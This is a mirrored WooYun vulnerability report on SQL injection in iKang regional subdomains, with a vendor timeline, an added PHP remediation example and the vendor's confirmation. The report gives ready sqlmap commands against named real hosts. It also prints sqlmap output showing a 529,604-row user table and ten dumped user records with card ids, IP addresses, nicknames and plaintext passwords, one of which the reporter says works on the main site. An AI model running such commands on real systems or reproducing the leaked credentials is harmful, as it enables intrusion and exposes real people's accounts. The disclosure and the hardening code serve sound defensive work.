WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online viewer -------- http://drop.zone.ci/
2014-08-28: Details reported to the vendor, awaiting vendor response
2014-08-29: Vendor confirmed; details disclosed to the vendor only
2014-09-08: Details disclosed to core white hats and relevant domain experts
2014-09-18: Details disclosed to regular white hats
2014-09-28: Details disclosed to intern white hats
2014-10-12: Details disclosed to the public
You know what I mean: don't store them in plaintext.
Don't store passwords in plaintext~~~~ iKang has subdomains for sub-sites in many regions. Some of these subdomains have anti-injection handling, some don't. No idea why.... Found two more sub-sites with SQL injection:
sqlmap.py -u "http://xzm.ikang.com/news_article.php?id=1" --random-agent --dbs
sqlmap.py -u "http://cdhzb.ikang.com/news_article.php?id=1" --random-agent
By the look of it, many sub-sites and other applications share the same database. This injection point likewise gives access to 33 databases. Take the web database as an example; it should be the main site's database. The details of 500,000 registered users are stored in plaintext, passwords included.
[13:41:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.4.2, Apache 2.0.52
back-end DBMS: MySQL 5.0.11
[13:41:56] [INFO] resumed: 529604
Database: web
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 529604  |
+--------+---------+
[13:41:56] [INFO] fetched data logged to text files under '/home/litdg/workspace/sqlmap/output/cqhnb.ikang.com'
A password taken from the dump was tested and logs in to the main site.
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.4.2, Apache 2.0.52
back-end DBMS: MySQL 5.0.11
Database: web
Table: user
[10 entries]
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| id | cardid           | corpid | memberid | ip              | city    | type    | title   | email                   | status | content | nickname                       | keywords | password  |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| 1  | 7000000000000001 | 2383   | 300535   | 60.194.121.93   | <blank> | <blank> | <blank> | [email protected]       | 1      | <blank> | Raymond                        | <blank>  | soso      |
| 2  | 0021000000157444 | 206    | NULL     | 61.129.127.226  | <blank> | <blank> | <blank> | [email protected]       | 0      | <blank> | RoqueL                         | <blank>  | anichr    |
| 3  | 1111000000012757 | 2383   | NULL     | 124.203.150.151 | <blank> | <blank> | <blank> | [email protected]       | 0      | <blank> | lm_irena                       | <blank>  | 596621    |
| 4  | NULL             | NULL   | NULL     | 222.35.170.153  | <blank> | <blank> | <blank> | [email protected]       | 0      | <blank> | Judy                           | <blank>  | anichr    |
| 5  | 1111000000016090 | 2383   | NULL     | 218.23.34.152   | <blank> | <blank> | <blank> | [email protected]       | 0      | <blank> | mayimin                        | <blank>  | 550223    |
| 6  | NULL             | NULL   | NULL     | 219.142.174.152 | <blank> | <blank> | <blank> | [email protected]       | 0      | <blank> | Divine                         | <blank>  | 123456    |
| 7  | 7000000000000003 | 2383   | NULL     | 61.51.225.93    | <blank> | <blank> | <blank> | [email protected]       | 0      | <blank> | motuo12345                     | <blank>  | 453392123 |
| 8  | NULL             | NULL   | NULL     | NULL            | <blank> | <blank> | <blank> | [email protected]       | 0      | <blank> | 412545                         | <blank>  | ikang1371 |
| 9  | 1111000000016999 | 2383   | NULL     | 218.19.161.78   | <blank> | <blank> | <blank> | [email protected]       | 0      | <blank> | kong168168                     | <blank>  | 65124104  |
| 10 | 7000000000000004 | 2383   | NULL     | 222.130.86.172  | <blank> | <blank> | <blank> | [email protected]       | 0      | <blank> | \\?d2\\?a6\\?bd\\?f0\\?c0\\?bc | <blank>  | ikang1371 |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
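The two defects in this report are a request parameter concatenated into SQL in a news_article.php-style page, and a user table that stores passwords in plaintext. The following is an added example (not iKang's code and not part of the original report) showing the vulnerable lookup next to its hardened form and a hashed-password registration, login and one-off migration path, written for a modern PHP with PDO. The table and column names news_article(id, title, content) and user(id, email, password), and the $pdo connection setup, are assumptions based on the dump above; the PHP 4.4.2 shown in the sqlmap output has neither PDO nor password_hash(), so upgrading the runtime is part of the fix.

```php
<?php
// Added example, not the site's own code. Assumes tables
// news_article(id, title, content) and user(id, email, password) (assumed names)
// and a MySQL DSN; requires PHP >= 5.5 for password_hash()/password_verify().
declare(strict_types=1);

function connect(string $dsn, string $user, string $pass): PDO {
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES   => false, // real server-side prepared statements
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

// Vulnerable pattern, the kind of query the sqlmap run above exploits:
// the raw request parameter is interpolated straight into the SQL text.
function fetchArticleVulnerable(PDO $pdo, string $id): ?array {
    $row = $pdo->query("SELECT id, title, content FROM news_article WHERE id = $id")->fetch();
    return $row === false ? null : $row;
}

// Hardened: validate the type first, then bind the value as a parameter so the
// input can never change the structure of the query.
function fetchArticle(PDO $pdo, string $rawId): ?array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // not a positive integer: treat as "no such article", do not echo it back
    }
    $stmt = $pdo->prepare('SELECT id, title, content FROM news_article WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

// Password storage: keep only a salted, slow hash, never the password itself.
function registerUser(PDO $pdo, string $email, string $password): void {
    $hash = password_hash($password, PASSWORD_DEFAULT); // bcrypt, per-user salt
    $stmt = $pdo->prepare('INSERT INTO user (email, password) VALUES (:email, :hash)');
    $stmt->execute([':email' => $email, ':hash' => $hash]);
}

function login(PDO $pdo, string $email, string $password): bool {
    $stmt = $pdo->prepare('SELECT id, password FROM user WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch();
    if ($row === false || !password_verify($password, $row['password'])) {
        return false;
    }
    // Transparently upgrade hashes when the default cost or algorithm changes.
    if (password_needs_rehash($row['password'], PASSWORD_DEFAULT)) {
        $upd = $pdo->prepare('UPDATE user SET password = :hash WHERE id = :id');
        $upd->execute([':hash' => password_hash($password, PASSWORD_DEFAULT), ':id' => $row['id']]);
    }
    return true;
}

// One-off migration for a table that already holds plaintext passwords, as the
// `web`.`user` dump does: hash every stored value in place and return the count.
// For a table of ~530k rows this should be run in batches rather than via fetchAll().
function migratePlaintextPasswords(PDO $pdo): int {
    $rows   = $pdo->query('SELECT id, password FROM user')->fetchAll();
    $update = $pdo->prepare('UPDATE user SET password = :hash WHERE id = :id');
    $n = 0;
    foreach ($rows as $row) {
        if (strncmp($row['password'], '$2y$', 4) === 0) {
            continue; // already a bcrypt hash
        }
        $update->execute([
            ':hash' => password_hash($row['password'], PASSWORD_DEFAULT),
            ':id'   => $row['id'],
        ]);
        $n++;
    }
    return $n;
}

// Usage (DSN and credentials are placeholders):
// $pdo = connect('mysql:host=127.0.0.1;dbname=web;charset=utf8mb4', 'app', 'secret');
// $article = fetchArticle($pdo, $_GET['id'] ?? '');
// $ok = login($pdo, $_POST['email'] ?? '', $_POST['password'] ?? '');
```

With PDO::ATTR_EMULATE_PREPARES disabled the parameter travels to MySQL separately from the statement text, so the `id` value is never parsed as SQL; the integer validation in front of it is defence in depth and keeps junk input out of the error log. After the migration the dump above would expose only bcrypt hashes, which cannot be replayed against the main site the way the plaintext value in this report was.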
Severity: High
Vulnerability Rank: 20
Confirmed: 2014-08-29 14:44
Vulnerability confirmed, we will fix it immediately, thank you!
None